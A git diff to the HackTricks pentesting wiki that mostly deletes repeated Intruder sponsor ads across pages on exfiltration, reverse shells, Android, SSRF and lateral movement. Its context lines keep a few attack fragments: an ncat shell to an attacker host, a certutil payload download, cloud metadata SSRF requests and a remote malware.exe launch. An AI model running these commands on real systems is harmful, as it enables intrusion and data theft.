diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 59cb57f24..60b1645bf 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -14,14 +14,6 @@ Other ways to support HackTricks: -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Commonly whitelisted domains to exfiltrate information Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused @@ -181,14 +173,6 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## SMB Kali as server @@ -392,12 +376,6 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/shells/linux.md index 643cae5f0..fda81890a 100644 --- a/generic-methodologies-and-resources/shells/linux.md +++ b/generic-methodologies-and-resources/shells/linux.md @@ -173,14 +173,6 @@ victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl attacker> ncat -v 10.0.0.22 4444 --ssl ``` -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Golang ```bash diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index f833c5862..f85528e5c 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Lolbas The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\ @@ -332,14 +324,6 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil **Detected by defender** -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## **Cscript/Wscript** ```bash @@ -578,14 +562,6 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) * [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ​ - -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index fb8434b9d..86b03378e 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Android Security Model **There are two layers:** @@ -118,15 +110,6 @@ In Android development, **Java or Kotlin** is used for creating apps. Instead of For reverse engineering, **Smali** becomes crucial. It's the human-readable version of DEX bytecode, acting like assembly language by translating source code into bytecode instructions. Smali and baksmali refer to the assembly and disassembly tools in this context. - -*** - -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -*** - ## Intents Intents are the primary means by which Android apps communicate between their components or with other apps. These message objects can also carry data between apps or component, similar to how GET/POST requests are used in HTTP communications. @@ -424,17 +407,6 @@ if (dpm.isAdminActive(adminComponent)) { } ``` -*** - -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index b27ef0b66..20bd390a2 100644 --- a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. # Automatic @@ -67,13 +59,6 @@ Then save the file & back out of all the directories & rebuild the apk with the Finally, you need just to **sign the new application**. [Read this section of the page Smali - Decompiling/\[Modifying\]/Compiling to learn how to sign it](smali-changes.md#sing-the-new-apk). -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index d6e559304..53cc87f45 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -12,14 +12,6 @@
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals) * [ ] [Basics](android-app-pentesting/#fundamentals-review) @@ -75,12 +67,6 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track * [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/network-services-pentesting/ipsec-ike-vpn-pentesting.md index 5d3587afc..13121e1bc 100644 --- a/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Basic Information **IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions. @@ -290,12 +282,6 @@ Ensure that actual, secure values are used to replace the placeholders when conf * `port:500 IKE` -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index bf671da8d..0f2647145 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Basic Information From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): @@ -386,14 +378,6 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## MSSQL Privilege Escalation ### From db\_owner to sysadmin @@ -548,15 +532,6 @@ You probably will be able to **escalate to Administrator** following one of thes * [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/) * [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) -​ - -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 2604eda9d..ee00c2f0e 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -150,9 +150,6 @@ Entry_6: Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - - -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md index 2ac735b55..23bb52896 100644 --- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md +++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -12,14 +12,6 @@ -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ### **What is a RID** ### Overview of Relative Identifiers (RID) and Security Identifiers (SID) @@ -105,13 +97,6 @@ done To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md). -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md index 19638ade4..a49e5f283 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat.md @@ -262,10 +262,6 @@ msf> use post/windows/gather/enum_tomcat Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - - -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md index 88c14cd8e..e28e836e3 100644 --- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md +++ b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md @@ -12,14 +12,6 @@
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ### Avoid to run with root In order to not run Tomcat with root a very common configuration is to set an Apache server in port 80/443 and, if the requested path matches a regexp, the request is sent to Tomcat running on a different port. @@ -157,13 +149,6 @@ The file shows us what each of the roles `manager-gui`, `manager-script`, `manag * [https://academy.hackthebox.com/module/113/section/1090](https://academy.hackthebox.com/module/113/section/1090) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/bypass-payment-process.md b/pentesting-web/bypass-payment-process.md index acda14d3d..50ee0200d 100644 --- a/pentesting-web/bypass-payment-process.md +++ b/pentesting-web/bypass-payment-process.md @@ -14,13 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** ## Payment Bypass Techniques @@ -53,14 +46,6 @@ If you encounter a parameter that contains a URL, especially one following the p 2. **Modify Responses**: Attempt to modify the responses before they are processed by the browser or the application to simulate a successful transaction scenario. -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/h2c-smuggling.md b/pentesting-web/h2c-smuggling.md index 065346a59..4ad5ffe79 100644 --- a/pentesting-web/h2c-smuggling.md +++ b/pentesting-web/h2c-smuggling.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## H2C Smuggling ### HTTP2 Over Cleartext (H2C) @@ -112,13 +104,6 @@ Check the labs to test both scenarios in [https://github.com/0ang3el/websocket-s * [https://bishopfox.com/blog/h2c-smuggling-request](https://bishopfox.com/blog/h2c-smuggling-request) * [https://github.com/0ang3el/websocket-smuggle.git](https://github.com/0ang3el/websocket-smuggle.git) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 8a3c99d21..686847027 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -14,14 +14,6 @@ Other ways to support HackTricks:
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## AWS ### Abusing SSRF in AWS EC2 environment @@ -364,14 +356,6 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Azure ### Azure VM @@ -596,12 +580,6 @@ Rancher's metadata can be accessed using: * `curl http://rancher-metadata//` -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md index f07ba7b2d..437c2e2db 100644 --- a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md +++ b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md @@ -14,14 +14,6 @@
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Basic Information A **service worker** is a script run by your browser in the background, separate from any web page, enabling features that don't require a web page or user interaction, thus enhancing **offline and background processing** capabilities. Detailed information on service workers can be found [here](https://developers.google.com/web/fundamentals/primers/service-workers). By exploiting service workers within a vulnerable web domain, attackers can gain control over the victim's interactions with all pages within that domain. @@ -123,13 +115,6 @@ For an example of this check the reference link. * [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/todo/radio-hacking/flipper-zero/fz-nfc.md b/todo/radio-hacking/flipper-zero/fz-nfc.md index 2652e73a4..4bccc8f9b 100644 --- a/todo/radio-hacking/flipper-zero/fz-nfc.md +++ b/todo/radio-hacking/flipper-zero/fz-nfc.md @@ -12,14 +12,6 @@
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## Intro For info about RFID and NFC check the following page: @@ -95,13 +87,6 @@ However, you **can't read the CVV this way** (the 3 digits on the back of the ca * [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md index 392ca8f28..aabb5e8e1 100644 --- a/windows-hardening/lateral-movement/dcom-exec.md +++ b/windows-hardening/lateral-movement/dcom-exec.md @@ -12,14 +12,6 @@
-
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -*** - ## MMC20.Application **For more info about this technique chech the original post from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)** @@ -134,12 +126,6 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe * [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/) * [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) -
- -Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!